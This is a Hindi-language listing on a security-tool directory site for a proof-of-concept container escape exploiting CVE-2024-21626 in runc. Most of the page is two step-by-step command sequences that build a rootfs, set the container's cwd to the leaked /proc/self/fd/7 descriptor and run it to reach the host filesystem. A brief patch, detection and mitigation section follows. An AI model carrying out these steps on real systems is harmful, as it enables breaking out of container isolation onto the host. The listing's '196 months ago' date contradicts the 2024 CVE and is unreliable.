Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2024-21626-runc-1.1.11-escape — CVE-2024-21626 के लिए PoC: runc pivot_root से पहले एक आंतरिक fd लीक करता है जो होस्ट CWD को संदर्भित करता है, process.cwd को /proc/self/fd/7 पर सेट करके कंटेनर एस्केप को सक्षम करता है | Kitploit
उपकरण/GitHubGitHub/strikoder-premium/cve-2024-21626-runc-1.1.11-escape
कंटेनर सुरक्षाभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगकंटेनर एस्केप
GitHubstrikoder-premium/cve-2024-21626-runc-1.1.11-escape

cve-2024-21626-runc-1.1.11-escape

CVE-2024-21626 के लिए PoC: runc pivot_root से पहले एक आंतरिक fd लीक करता है जो होस्ट CWD को संदर्भित करता है, process.cwd को /proc/self/fd/7 पर सेट करके कंटेनर एस्केप को सक्षम करता है

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
196 महीने पहलेअभी तक समीक्षित नहीं

CVE-2024-21626 - runc Leaky Vessels

परिचय

फ़ील्डविवरण
CVECVE-2024-21626
प्रभावित घटकrunc ≤ 1.1.11
कमज़ोरी वर्गफ़ाइल डिस्क्रिप्टर रिसाव के माध्यम से कंटेनर एस्केप
उपनामLeaky Vessels

मूल कारण

runc कंटेनर प्रक्रिया चलाने से पहले होस्ट फ़ाइलसिस्टम के कार्यशील निर्देशिका की ओर इशारा करते हुए एक आंतरिक फ़ाइल डिस्क्रिप्टर (आमतौर पर fd/7) लीक करता है। config.json में कंटेनर के cwd को /proc/self/fd/7 पर सेट करने से, प्रक्रिया कंटेनर rootfs के बजाय होस्ट निर्देशिका में आ जाती है — इससे कंटेनर एस्केप प्राप्त होता है।


शोषण विधियाँ

विधि 1 - होस्ट बाइनरी से मैन्युअल rootfs

होस्ट से सीधे बाइनरी कॉपी करके एक न्यूनतम rootfs बनाएँ:

root@kitploit:~
# 1. Create directory structure
cd /tmp && mkdir -p strikoder/rootfs && cd strikoder
mkdir -p rootfs/lib64 rootfs/lib

# 2. Copy binaries and required libraries
cp -aL /bin rootfs/bin
cp /lib64/ld-linux-x86-64.so.2 rootfs/lib64/
cp -a /lib/x86_64-linux-gnu rootfs/lib

# 3. Generate default OCI config
runc spec

# 4. Patch cwd in config.json to point at leaked host fd
# Change: "cwd": "/"
# To:     "cwd": "/proc/self/fd/7"
vi config.json

# 5. Run the container with the vulnerable runc binary
sudo /opt/debug --log /tmp/log.json run strikontainer

क्या होता है: runc कंटेनर rootfs पर जाने से पहले होस्ट CWD को संदर्भित करते हुए fd/7 खोलता है। cwd को /proc/self/fd/7 पर सेट करने से runc कंटेनर के बजाय होस्ट पथ में chdir() करता है — जिससे आप वास्तविक फ़ाइलसिस्टम पर पहुँच जाते हैं।


विधि 2 - rootfs के रूप में Alpine Docker इमेज

यदि आपको अधिक पूर्ण वातावरण की आवश्यकता है या होस्ट में सीमित बाइनरी हैं:

root@kitploit:~
# --- On your attack machine ---
# Export a minimal Alpine filesystem
docker export $(docker create alpine:latest) > alpine.tar

# Transfer alpine.tar to the target, then:

# --- On target ---
mkdir -p /tmp/strikoder/rootfs && cd /tmp/strikoder
tar -xvf /path/to/alpine.tar -C rootfs

# Generate OCI bundle config
runc spec

# Patch cwd (same as Method 1)
vi config.json
# "cwd": "/proc/self/fd/7"

# Run
sudo /opt/debug --log /tmp/log.json run strikontainer

पहचान और शमन

  • पैच: runc को ≥ 1.1.12 (या ≥ 1.2.0-rc.2) में अपग्रेड करें
  • पता लगाना: कंटेनर cwd कॉन्फ़िगरेशन में /proc/self/fd/ पर openat() की निगरानी करें; cwd में /proc/self/fd वाले OCI बंडलों पर अलर्ट करें
  • शमन: seccomp प्रोफ़ाइल का उपयोग करें जो /proc एक्सेस को प्रतिबंधित करती हैं; मजबूत आइसोलेशन के लिए रूटलेस कंटेनर या gVisor/Kata पर विचार करें

संदर्भ

  • NVD: CVE-2024-21626
  • runc GitHub Security Advisory
  • Snyk Leaky Vessels Blog
  • HackTheBox - GiveBack machine
टूल डाउनलोड करें